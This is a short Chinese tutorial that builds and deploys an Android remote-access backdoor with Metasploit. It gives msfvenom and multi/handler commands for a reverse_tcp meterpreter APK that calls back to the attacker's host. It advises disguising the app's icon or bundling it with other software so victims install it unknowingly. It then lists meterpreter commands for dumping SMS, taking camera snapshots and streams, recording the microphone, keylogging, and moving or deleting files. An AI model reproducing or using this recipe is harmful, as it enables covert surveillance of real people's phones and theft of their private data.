一、什么是MSF
MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
二、演示环境
kali ip: 192.168.249.137
夜神模拟器 Android7.1.2
三、渗透过程
1.使用root权限
su root
2.生成可执行后门文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.249.130 LPORT=5555 R >Android.apk
LHOST的IP写自己kali的ip,LPORT选一个没占用的端口,apk的名字自定义
运行代码生成文件
3.将生成的后门文件,放入靶机
4. 运行msfconsole命令
5.参数配置
use exploit/multi/handler (选择模块)
set payload android/meterpreter/reverse_tcp (选择攻击模块)
set LhOST 192.168.249.130 (本地ip)
set lport 5555 (端口)
参数配置完成,查看配置
show options
exploit 运行
6.在靶机运行后门程序
我们可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
四、命令执行
1.查看对方手机系统信息
命令 sysinfo
2.查看对方手机安装哪些app文件
命令: app_list
3.控制摄像头拍摄一张照片
命令 webcam_snap
4.实时查看靶机的信息
命令 dump_sms
5.上传文件到靶机
upload /文件 /目标地址
6.下载文件到本机
download 文件
还可以查看帮助文档,命令
help
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
扫一扫
1855
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
